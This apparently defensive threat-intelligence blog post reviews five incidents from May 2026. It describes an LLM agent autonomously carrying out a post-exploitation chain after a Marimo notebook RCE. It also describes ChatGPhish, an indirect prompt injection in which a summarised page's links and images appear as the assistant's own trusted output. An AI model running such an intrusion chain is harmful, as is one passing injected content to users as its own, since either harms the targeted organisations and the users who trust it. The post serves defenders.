Dennis Kim

Posted on May 30

AI at the Wheel: When Hacking Stops Needing a Human" published: false description: "Five threats from late May 2026 mark an inflection point.

#ai #security #cybersecurity #web3

— AI is crossing from a hacking tool to an autonomous operator that decides and acts on its own. A field analysis.

For two years, "AI in offensive security" mostly meant one thing: a faster human. Attackers used large language models to write phishing emails, draft malware, translate lures, or summarize stolen data. The model was a power tool. A human still held it.

A cluster of incidents disclosed in late May 2026 quietly broke that assumption. In at least one case, the human let go of the wheel — and the attack kept driving.

I publish an independent, OSINT-based CTI archive (TLP:GREEN), and over the past week I released five reports in four languages that, read together, sketch the same arc: AI is moving from a tool you point at a target to an operator that picks the target's locks by itself. Here is the field view.

The spectrum: tool → operator → attack surface

It helps to think of AI's role in an intrusion as a spectrum, not a switch.

AI as a tool — the model accelerates a human-run attack (phishing copy, malware scaffolding, cryptojacking automation). The judgment is still human.
AI as an autonomous operator — the model interprets live output and decides the next action with no human in the loop. The judgment is the model's.
AI as an attack surface — the trust users place in AI output becomes the thing being exploited. The model is the victim's blind spot.

Most of 2026's headlines still live in the first bucket. What makes this batch notable is that it spans all three — and includes the first credible public case of the second.

1. Marimo: the first AI-agent-driven intrusion

This is the headline. Sysdig's Threat Research Team documented an intrusion where a large language model agent autonomously ran the entire post-exploitation phase — what they described as the first "AI-agent-driven" intrusion they've recorded.

The entry point was a pre-authenticated RCE in an internet-exposed Marimo notebook (CVE-2026-39987, CVSS 9.3, now on the CISA KEV list). The flaw is almost embarrassingly clean: the /terminal/ws WebSocket endpoint skips authentication validation that its sibling endpoints perform, so a single unauthenticated request yields a full PTY shell.

What happened after the shell is the point. An LLM agent ran a four-stage pivot:

Harvest two cloud credentials from the host.
Replay them through a Cloudflare Workers fan-out egress pool, then pull an SSH private key from AWS Secrets Manager.
Open eight parallel SSH sessions into a downstream bastion.
Dump an internal PostgreSQL database — schema and contents — in under two minutes.

The whole chain, from initial access to exfiltration, finished in under an hour. The agent branched on the output of each command, retried failed paths while keeping context, and selected the exact secret it needed. That is human-grade judgment fused with machine-grade speed.

The uncomfortable implication for defenders: a patch blocks the entry, not the operating speed. A sub-two-minute database dump structurally outruns the average human SOC response window. The unit of response moves from minutes to seconds.

2. ChatGPhish: when the AI's trust is the payload

If Marimo is "AI as operator," ChatGPhish (disclosed by Permiso Security) is "AI as attack surface" — and it requires no code execution at all.

The mechanism is indirect prompt injection through a renderer trust gap. When a user asks ChatGPT to summarize a web page, the chatgpt.com renderer trusts the Markdown links and images that came from that untrusted third-party page as if they were the assistant's own output. It auto-fetches the images and renders the links as live, clickable elements inside the trusted UI.

That yields three primitives: UI-redress phishing links that look like ChatGPT's own answer, spoofed "account security" alerts wearing the assistant's visual trust, and a QR-code pivot rendered from an attacker bucket that bypasses every desktop URL defense (the destination only resolves after you scan it on a second device). Even the auto-fetched images alone leak the victim's IP, User-Agent, and Referer.

No memory corruption. No privilege escalation. The single fact that the model cannot distinguish its own output from external content is enough to enable phishing, reconnaissance, and a device pivot. As of disclosure, the vendor had replied "could not reproduce," so treat it as live.

The lesson generalizes well beyond one product: AI output must be the start of verification, not the end of trust.

3. JINX-0164: the AI-era trust chain, end to end

JINX-0164 (named by Wiz) is a financially motivated cluster targeting crypto organizations on macOS since at least mid-2025. Its kill chain reads like a tour of every trust relationship a developer depends on:

A LinkedIn "recruiter" builds rapport, then sends a fake meeting link.
The victim installs a macOS RAT masquerading as coreaudiod (saved as ChromeUpdater, persisted via launchctl) — AUDIOFIX (a Python infostealer) plus MINIRAT (a Go backdoor).
The actor then moves laterally to CI/CD and code-distribution infrastructure, treating the developer laptop as a springboard, not a destination.
It has also trojanized the npm package @velora-dex/sdk (3 lines appended to dist/index.js that fetch a shell script delivering MINIRAT on import).

The TTPs overlap with North Korean clusters (BlueNoroff, Contagious Interview, UNC1069), but Wiz found no infrastructure overlap and stopped short of state attribution. That ambiguity is itself the signal: as DPRK tradecraft gets commercialized and imitated, "who did it" matters less than "which trust was abused" — recruitment trust, package trust, dev-infrastructure trust.

4. Gogs: the old-school flaw that still wins

Not every threat is exotic, and Gogs is the reminder. Rapid7 disclosed an unauthenticated-to-RCE chain (their rating: CVSS 9.4, no CVE yet) in the self-hosted Git service's "Rebase before merging" operation. A malicious branch name injects the --exec flag into git rebase, running an arbitrary shell command on the server. Any authenticated user can do it; on a default install, a user can register, create a repo, flip one setting, and own the box solo — with cross-tenant access to everyone else's private repos.

It was reported to the maintainer on 2026-03-17 and remains unpatched, with a public Metasploit module automating the whole thing against Linux and Windows. Roughly 1,141 instances sit directly on the internet.

It's a textbook argument injection — trusting user input in a shell argument. The reason it belongs in this list: self-hosted Git is the single trust anchor for source code, deploy keys, and CI tokens. In an era of supply-chain-first attackers (see JINX above), an unpatched Git server is a bridgehead. Interim mitigations until a patch lands: DISABLE_REGISTRATION = true and MAX_CREATION_LIMIT = 0 in app.ini, plus removing internet exposure.

5. KelpDAO LayerZero bridge hack: the off-chain single point of failure

The Web3 entry rounds out the picture. The KelpDAO LayerZero bridge compromise is a study in how cross-chain security fails not in the smart contracts everyone audits, but in the off-chain verification infrastructure that quietly underpins them.

When the integrity of a bridge depends on an off-chain verifier — a relayer, an oracle, a signing service — that component becomes a single point of failure. Compromise it, and asset theft follows directly, no on-chain exploit required. It's the same structural theme as the rest of this list: the riskiest dependency is the trusted component nobody is watching, whether that's an analytics notebook, an AI renderer, an npm package, a Git server, or an off-chain verifier.

The through-line

Put the five side by side and the pattern is hard to miss. Four of them are about trust — the trust we extend to AI output, to recruiters, to packages, to self-hosted infrastructure, to off-chain verifiers. One of them, Marimo, adds the new variable: autonomy at machine speed.

That combination is what makes the 2026 inflection real. We are leaving the world where AI was a faster pen for the attacker, and entering one where AI can be the attacker, the attack surface, or both in the same incident. Distributed egress, adaptiveness, and second-level speed are no longer advanced tradecraft — they're becoming default features of the threat.

My own framing hasn't changed, and this batch reinforces it: an LLM is a spreadsheet, not an oracle. It is astonishingly powerful as an instrument and catastrophic as an unverified authority — and that is exactly the line attackers are now operating along. The defensive starting point is symmetric:

Reduce exposure and isolate credentials, so the value of entry drops.
Add behavioral runtime detection and automatic containment, so the speed of operation can't outrun you.
Treat every AI output — and every trusted dependency — as the start of verification, not the end of it.

Read the full reports

Each of these five is written up in depth (attack chains, IOCs, detections, mitigations, and a Korea-context assessment), published as TLP:GREEN and available in English, Korean, Japanese, and Chinese. The archive also tracks the broader 2026 trend lines — DPRK clusters, supply-chain attacks, AI/LLM security, and Web3 incidents.

👉 Full index and reports: CYBER-THREAT-INTELLIGENCE-REPORT (README, EN)

If you run exposed notebooks, self-hosted Git, crypto dev pipelines, or AI-assisted research workflows, the Marimo, Gogs, JINX-0164, ChatGPhish, and KelpDAO write-ups are the ones to start with.

Independent CTI archive · OSINT-based · TLP:GREEN. Feedback and corrections welcome via the repository's issues.

DEV Community